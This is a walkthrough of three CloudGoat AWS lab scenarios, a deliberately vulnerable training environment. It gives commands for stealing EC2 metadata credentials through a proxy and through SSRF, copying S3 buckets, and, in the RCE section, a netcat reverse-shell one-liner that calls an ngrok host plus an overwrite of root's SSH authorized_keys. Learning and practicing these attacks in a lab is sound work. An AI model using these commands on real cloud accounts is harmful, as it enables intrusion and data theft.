AWS Cloud Goat
CloudGoat is a "vulnerable by design" AWS deployment tool, essentially a CTF for learning and practicing common AWS abuses
Setting up Cloud Goat
Git clone the CloudGoat repo, install the requirements, and run it
CloudGoat also requires Terraform, which is used for managing cloud infrastructure through templates and policies, either via the CLI or as code
https://www.terraform.io/downloads
After downloading Terraform, move the binary to /usr/bin/, and after that you can run cloudgoat.py
Before creating a scenario, we need a free tier AWS account. Signing up does require valid credit card details, but no amount will be charged
Log in as the root user on the AWS Management Console
After logging in, we need to create a new IAM user and attach the AdministratorAccess policy to it. Skip the Add tags option
After creating the user, we'll get the AWS access key ID and secret access key
Now use awscli to configure an AWS profile for this user. The CloudGoat script will be using AWS resources from our account, so make sure to remove them after you are done with the scenarios
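A minimal example, assuming we name the profile cloudgoat (any name works as long as we tell CloudGoat to use the same profile); the command prompts for the access key ID, secret access key, default region and output format we got when creating the user:
aws configure --profile cloudgoat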
You may encounter an error where the CloudGoat script fails to install terraform-provider-archive; to fix this, manually download the binary and place it in /usr/bin
Cloud Breach s3 (Medium)
In this scenario we need to query the EC2 metadata service through a misconfigured reverse proxy to obtain AWS credentials, then use those keys to extract data from an S3 bucket. So let's create the scenario
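The scenario is created the same way as the others, with the create subcommand:
python3 cloudgoat.py create cloud_breach_s3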
To start attacking, we can get the target's IP address from the generated start.txt file
Running an nmap scan (it isn't strictly necessary) confirms that it's an EC2 instance, but the web server itself doesn't show anything
Making a request with curl shows that it's configured to work as a proxy that forwards requests to the EC2 metadata service
AWS exposes instance metadata on the link-local IP 169.254.169.254, so we need to set the Host header of the request to that address and make a request to /latest
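As a sketch, assuming <target-ip> is substituted with the IP from start.txt, the proxied metadata request looks like this:
curl -s http://<target-ip>/latest/meta-data/ -H 'Host: 169.254.169.254'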
So we can make a request to /latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-cloud_breach_s3_cgidkt0wpx0w0k, which will return temporary AWS credentials (access key, secret key and session token)
Adding a profile using these keys
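A minimal sketch, assuming the profile is called cloud_breach (as used in the commands below); since the metadata credentials are temporary, the session token has to be added as well:
aws configure --profile cloud_breach
aws configure set aws_session_token <token-from-metadata> --profile cloud_breach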
We can verify that the keys are working with
aws sts get-caller-identity --profile cloud_breach
We don't yet know the name of the S3 bucket, but we can list the buckets associated with these AWS keys
aws s3 ls --profile cloud_breach
To view the contents of this S3 bucket, we can list it by giving the bucket name, which is cg-cardholder-data-bucket-cloud-breach-s3-cgidkt0wpx0w0k
aws s3 ls s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidkt0wpx0w0k --profile cloud_breach
To copy all files from the S3 bucket we can use cp with --recursive to copy everything, and . as the destination so the files land in the current path
aws s3 cp s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidkt0wpx0w0k . --recursive --profile cloud_breach
Accessing any of these files means that we have compromised the S3 bucket, which completes this scenario
We can now destroy this challenge with python3 cloudgoat.py destroy cloud_breach_s3
EC2 SSRF (Medium)
In this scenario we have access to an IAM user, through which we have to enumerate permissions and find a Lambda function through which we can access an EC2 instance and extract data from an S3 bucket
To create this scenario, we need to run python3 cloudgoat.py create ec2_ssrf
But at the end this will fail because python3.6 is no longer supported for creating Lambda functions; we can fix it by replacing the runtime with python3.9 in scenarios/ec2_ssrf/terraform/lambda.tf
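As a one-liner, assuming the runtime appears as the literal string python3.6 in that file:
sed -i 's/python3\.6/python3.9/' scenarios/ec2_ssrf/terraform/lambda.tf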
Now running the script again to create the scenario
In start.txt we have the account ID and AWS access keys for the solus IAM user, so let's create a profile for the solus user with those keys
To verify if the AWS keys are working
aws sts get-caller-identity --profile solus
Listing lambda functions with
aws lambda list-functions --profile solus --region us-east-1
This reveals an EC2 access key and secret key in the function's environment variables; to use them we need to create another profile. Also, if we try invoking this function as the solus user, it won't work
So let's create an AWS profile for these keys
Running ec2 describe-instances to view the instances associated with this access key
aws ec2 describe-instances --profile solus_ec2 --region us-east-1
Scrolling down a little in the output, we'll find the instance details, including its public IP address
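Instead of scrolling through the JSON, the public IP can also be pulled out with a --query filter, for example:
aws ec2 describe-instances --profile solus_ec2 --region us-east-1 --query 'Reservations[].Instances[].PublicIpAddress'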
Running nmap scan on EC2 instance to see which ports are open
It has a web server running, so let's visit it. The default page shows an error because the creator didn't handle errors properly; we can resolve this by including the url GET parameter
As the page hints that this is about SSRF, we can try making a request to the EC2 metadata service on 169.254.169.254
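For example, assuming <ec2-public-ip> is the instance IP found earlier and using the url GET parameter mentioned above:
curl 'http://<ec2-public-ip>/?url=http://169.254.169.254/latest/meta-data/'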
Making a request to /latest/meta-data/iam/security-credentials/, we'll get the role name cg-ec2-role-ec2_ssrf_cgidne4wv0ljch, for which we can then read the AWS keys
With aws configure we can use these AWS keys to create a profile for ec2_ssrf; we also need to add the session token
To access the S3 bucket, we first need to list them with aws s3 ls --profile ec2_ssrf
Listing the contents of this bucket shows us a text file
Downloading this file with cp, we'll get AWS keys for another user, which seems to be privileged judging from the name of the text file
Checking this user's identity, it's shepard
Now we invoke the function we tried before with the solus user, but this time as shepard
aws lambda invoke --function-name cg-lambda-ec2_ssrf_cgidne4wv0ljch --profile ec2_ssrf_admin --region us-east-1 ./output.txt
Reading the response from the text file, we'll see that we completed this scenario
We can destroy this scenario with cloudgoat.py destroy ec2_ssrf
RCE Web App (Hard)
In this scenario we have access to two IAM users and an S3 bucket, which will lead us to a web app vulnerable to RCE
We can create this scenario with python3 cloudgoat.py create rce_web_app
But at the end it showed an error that it wasn't able to create the RDS (Amazon Relational Database Service) DB instance because it couldn't find PostgreSQL 9.6, which has been deprecated. This issue can be resolved by replacing the PostgreSQL version with 12
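To find where the version is defined, we can grep the scenario's Terraform files (the exact file layout may differ between CloudGoat versions):
grep -rn '9.6' scenarios/rce_web_app/terraform/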
Here we have two users, lara and mcduck, so first I'll take the path from lara
Path from Lara
Creating a profile for lara using her access and secret keys
We can verify that the keys are working
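For example, with the profile created above:
aws sts get-caller-identity --profile lara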
From this IAM user we can access s3 bucket
aws s3 ls --profile lara
We can see there are three buckets, but this user can only access the cg-logs bucket
To download the cg-lb-logs folder recursively
aws s3 cp --recursive s3://cg-logs-s3-bucket-rce-web-app-cgid3ntl2q2i88 . --profile lara
On accessing that folder, there's a log file which contains some requests
Making requests to check whether these URLs are alive shows that they are down
So we know there might be a web app running; we can try listing EC2 instances through this profile
aws ec2 describe-instances --profile lara --region us-east-1
We scan this EC2 instance for open ports, which shows that only SSH is open on the instance
So there's nothing we can do from the EC2 instance directly. The log file belongs to a load balancer, so we can try listing the load balancers with elbv2 describe-load-balancers
aws elbv2 describe-load-balancers --profile lara --region us-east-1
We can visit this url and access the site
This talks about visiting "the secret url" which we can find from the logs
This gives us a functionality to execute commands which we can abuse to get a reverse shell
For the reverse shell, we can use ngrok, which exposes a local port over the internet. I was having issues with ngrok not working on Kali Linux, so I switched to Ubuntu and got a shell using the busybox variant of netcat
echo "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 0.tcp.ap.ngrok.io 11400 >/tmp/f" |base64 -w0
We can run ngrok with ngrok tcp 2222
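ngrok then forwards the public port (11400 in the payload above) to the local port 2222, where we still need a listener of our own, for example:
nc -lvnp 2222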
But the issue is that when getting a reverse shell, the application stops responding
We can try accessing root's SSH key, but it was never generated
Since we are the root user, we can add our own SSH public key and log in with the corresponding private key
echo "ssh public key " > /root/.ssh/authorized_keys
On adding the key I was getting an error due to an Unterminated quoted string. I am not sure why, but I wasn't able to add the SSH key this way
If we check root's authorized_keys file, it says to login as ubuntu
Either the SSH key is being truncated for some reason, or it needs a proper key format, as AWS supports ED25519 and 2048-bit SSH-2 RSA keys for Linux instances; there is even an issue reported for this part
Generate the key again with ed25519
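For example (the key file name here is arbitrary):
ssh-keygen -t ed25519 -f ./cloudgoat_key -N ''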
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG5QcNdp9tUZRQvmkPMDfZpXciiy+7YVTdNI9RyUPbcR arz@kali" > /root/.ssh/authorized_keys
We can see that this worked perfectly with no errors, which means we can now log in to the EC2 instance we found earlier
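A sketch of the login, assuming the key pair generated above and the instance's public IP; we log in as root since that's whose authorized_keys we overwrote:
ssh -i ./cloudgoat_key root@<ec2-public-ip>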
Having access to EC2, we can query for the metadata from the magic AWS IP 169.254.169.254
curl 169.254.169.254/latest/meta-data/iam/security-credentials/cg-ec2-role-rce_web_app_cgidd9pk8lqvym
Using these keys we can create a new AWS profile
With this user we can access the secrets s3 bucket and find db.txt
Downloading the file
From this file we'll get the credentials for database
DB instance can be found with rds describe-db-instances
aws rds describe-db-instances --profile rce_web --region us-east-1
This is an internal instance, so we need to access it from ec2
Database can be accessed with psql
psql -h cg-rds-instance-rce-web-app-cgidd9pk8lqvym.cvqhxg0xsdki.us-east-1.rds.amazonaws.com -U cgadmin -d cloudgoat
Listing the tables with \d, we see a table named sensitive_information, so let's query it with select * from sensitive_information;
Having obtained the secret password, the RCE scenario is complete
Path from McDuck
Using McDuck's aws keys
With this user we can try listing s3 buckets
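Assuming the profile was named mcduck:
aws s3 ls --profile mcduck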
With lara we were only able to access the cg-logs bucket, but with mcduck we can also access the cg-keystore bucket
Downloading the public and private keys
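For example, with the keystore bucket name taken from the listing above (the exact name includes a per-deployment cgid suffix):
aws s3 cp --recursive s3://<cg-keystore-bucket-name> . --profile mcduck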
From lara we already know the IP of the EC2 instance, so we can log in as the ubuntu user over SSH
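For example, assuming the private key downloaded from the keystore bucket is saved locally as <private-key-file>:
chmod 600 <private-key-file>
ssh -i <private-key-file> ubuntu@<ec2-public-ip>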
From here we could either get the keys from the metadata service, or install awscli, access the S3 bucket to get the database credentials, list the relational database instance, and use the PostgreSQL client to access the database; since we have sudo privileges we can become the root user
apt install awscli
aws sts get-caller-identity
Accessing the s3 bucket to get database credentials
Now getting database instance's IP
aws rds describe-db-instances --region us-east-1
And with the credentials and the database instance's address, we'll be able to log in and complete the scenario like we did with the lara user.
References
- https://github.com/RhinoSecurityLabs/cloudgoat
- https://www.terraform.io/downloads
- https://rhinosecuritylabs.com/aws/introducing-cloudgoat-2/
- https://pentestbook.six2dez.com/enumeration/cloud/aws
- https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/CHAP_PostgreSQL.html
- https://www.bluematador.com/learn/aws-cli-cheatsheet
- https://github.com/RhinoSecurityLabs/cloudgoat/issues/49
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql